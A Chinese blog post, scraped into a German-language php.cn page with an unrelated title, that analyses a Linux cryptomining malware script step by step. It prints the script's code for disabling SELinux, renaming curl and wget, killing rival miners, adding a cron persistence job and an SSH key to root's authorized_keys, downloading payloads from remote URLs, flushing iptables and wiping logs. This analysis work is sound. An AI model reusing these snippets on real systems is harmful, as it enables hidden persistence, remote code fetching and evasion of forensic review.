Heim > Betrieb und Instandhaltung > Sicherheit > Welche Skriptmethoden gibt es für Linux?

Welche Skriptmethoden gibt es für Linux?

WBOY
Freigeben: 2023-05-22 08:11:59
nach vorne
4301 Leute haben es durchsucht

code 1

#!/bin/sh
Nach dem Login kopieren

脚本的第一行,看起来是一行注释,但其实并不是。它规定了接下来的脚本,将要采用哪一个SHELL执行。像我们平常用的bash、zsh等,属于sh的超集,这个脚本使用sh作为执行的shell,具有更好的可移植性。

code 2

setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
Nach dem Login kopieren

setenforce是Linux的selinux防火墙配置命令,执行setenforce 0  表示关闭selinux防火墙。2代表的是标准错误(stderr)的意思。因此,可使用重定向符将命令的错误输出重定向到/dev/null设备。这个设备是一个虚拟设备,意思是什么都不干。非常适合静悄悄的干坏事。

code 3

sync && echo 3 >/proc/sys/vm/drop_caches
Nach dem Login kopieren

脚本贴心的帮我们释放了一些内存资源,以便获取更多的资源进行挖矿。

众所周知,Linux系统会随着长时间的运行,会产生很多缓存,清理方式就是写一个数字到drop_caches文件里,这个数字通常为3。执行sync命令后,系统将所有未写入的缓冲区写入磁盘,因此可以安全地释放缓存。

code 4

crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/sysupdates" bbdir="/usr/bin/curl" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget /usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur
Nach dem Login kopieren

没错,上面这些语句就是完成了一些普通的操作。值得注意的是,它把我们的一些常用命令,使用mv命令给重名了。这在执行命令的时候,就会显得分成功能的蛋疼。这脚本已经更改了计算机的一些文件,属于犯罪的范畴了。

脚本为了复用一些功能,抽象出了很多的函数。我们直接跳到main函数的执行,然后看一下这个过程。

code 5

首先是kill_miner_proc函数。代码很长,就不全部贴出来了。

kill_miner_proc() {     ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9   ...     pkill -f biosetjenkins     pkill -f Loopback     ...     crontab -r     rm -rf /var/spool/cron/*
Nach dem Login kopieren

挖矿领域是一个相爱相杀的领域。这个方法首先使用ps、grep、kill一套组合,干掉了同行的挖矿脚本,然后停掉了同行的cron脚本,黑吃黑的感觉。

在这段脚本里,使用了pkill命令。这个命令会终止进程,并按终端号踢出用户,比较暴力。

code 6

接下来执行的是kill_sus_proc函数。

ps axf -o "pid"|while read procid do ... done
Nach dem Login kopieren

ps加上o参数,可以指定要输出的列,在这里只输出的进程的pid,然后使用read函数,对procid进行遍历操作。

code 7

ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then ... fi
Nach dem Login kopieren

上面就是遍历操作过程了,我们可以看到if语句的语法。其中$?指的是上一个命令的退出状态。0表示没有错误,其他任何值表明有错误。-ne是不等于的意思,意思就是能够匹配到tmp这个字符串。

code 8

ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid do ... done
Nach dem Login kopieren

呵呵,上面又来了一次循环遍历。不过这次针对的目标,是cpu使用超过40%的进程。对于阅读过xjjdog的awk分析的同学来说,他们应该非常熟悉这个命令。这就有点狠了:影响我挖矿的进程,都得死!

相煎何太急。

code 9

再接下来,脚本针对不同的用户属性,进行了不同的操作。

首先是root用户。通过判断是否存在$rtdir文件,来确定是否是root权限。

chattr -i /etc/sysupdate* chattr -i /etc/config.json* chattr -i /etc/update.sh* chattr -i /root/.ssh/authorized_keys* chattr -i /etc/networkservice
Nach dem Login kopieren

使用chattr命令将一些关键文件设置为只读属性,限制其随意更改,这确实很严厉。然后,操作cron程序,把脚本的更新服务加入到定时中。

就是下面这段脚本。

code 10

if [ ! -f "/usr/bin/crontab" ] then     echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} else     [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - fi
Nach dem Login kopieren

注意[[ $cont =~ "update.sh" ]]这以小段代码,怪异的很。在shell中内置的一个命令是[[ ]],它支持字符串模式匹配。=~的使用甚至支持shell的正则表达式,非常强大。它的输出结果是一个bool类型,所以能够使用||进行拼接。

而后面的单小括号 (),是的是一个命令组,括号中多个命令之间用分号隔开,最后一个命令可以没有分号;和`cmd`的效果基本是一样的。

code 11

搞完了定时任务,就要配置ssh自动登录了,通过把公钥追加到信任列表中就可以。

chmod 700 /root/.ssh/ echo >> /root/.ssh/authorized_keys chmod 600 root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/
Nach dem Login kopieren

code 12

说曹操曹操就到,下面的脚本就使用了``进行操作。

filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'` if [ "$filesize_config" -ne "$config_size" ] then     pkill -f sysupdate     rm /etc/config.json     downloads $config_url /etc/config.json $config_url_backup else     echo "no need download" fi
Nach dem Login kopieren

如果检测到配置文件大小不同,则进行重新下载,这个过程需要进行一系列复杂的操作。这就用到了downloads函数。

shell中的函数,看起来比较怪异,后面的参数传递,就像是脚本传递一样,传送给函数。

code 13

downloads $config_url /etc/config.json $config_url_backup
Nach dem Login kopieren

这句话,就传递了三个参数。

当然,文件要从遥远的服务器上下载。域名是.de结尾的,证明是个德国的域名,其他的我们一无所知。

downloads() {     if [ -f "/usr/bin/curl" ]     then     echo $1,$2         http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`         if [ "$http_code" -eq "200" ]         then             curl --connect-timeout 10 --retry 100 $1 > $2         elif [ "$http_code" -eq "405" ]         then             curl --connect-timeout 10 --retry 100 $1 > $2         else             curl --connect-timeout 10 --retry 100 $3 > $2         fi     elif [ -f "/usr/bin/cur" ]     then         http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`         if [ "$http_code" -eq "200" ]         then             cur --connect-timeout 10 --retry 100 $1 > $2         elif [ "$http_code" -eq "405" ]         then             cur --connect-timeout 10 --retry 100 $1 > $2         else             cur --connect-timeout 10 --retry 100 $3 > $2 fi     elif [ -f "/usr/bin/wget" ]     then         wget --timeout=10 --tries=100 -O $2 $1         if [ $? -ne 0 ]     then         wget --timeout=10 --tries=100 -O $2 $3         fi     elif [ -f "/usr/bin/wge" ]     then         wge --timeout=10 --tries=100 -O $2 $1         if [ $? -eq 0 ]         then             wge --timeout=10 --tries=100 -O $2 $3         fi     fi }
Nach dem Login kopieren

我觉得这段代码作者的水平没有得到很好的体现,代码写得又臭又长。应该是赶工期,没有想好代码的复用,才会写的这么有失水准。

我们上面说到,脚本改了几个命令的名字,其中就有curl。这个命令是如此的强大,以至于脚本的作者都忍不住加了不少参数。

  • -I 是用来测试http头信息

  • -m 设置最大传输时间

  • -o 指定保持的文件名。这里是/dev/null,呃呃呃

  • -s 静默模式。不输出任何东西

  • --connect-timeout 连接超时时间

  • --retry 重试次数,好狠100次

如果没有curl?那就使用替补的wget,套路都是一样的。

code 14

接下来是一系列相似的操作,最后,对iptables一批操作。

iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 3333 -j DROP iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -I INPUT -s 43.245.222.57 -j DROP service iptables reload
Nach dem Login kopieren

code 15

细心的脚本编写者,还使用命令清理了操作日志。

history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history
Nach dem Login kopieren

Das obige ist der detaillierte Inhalt vonWelche Skriptmethoden gibt es für Linux?. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:yisu.com
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage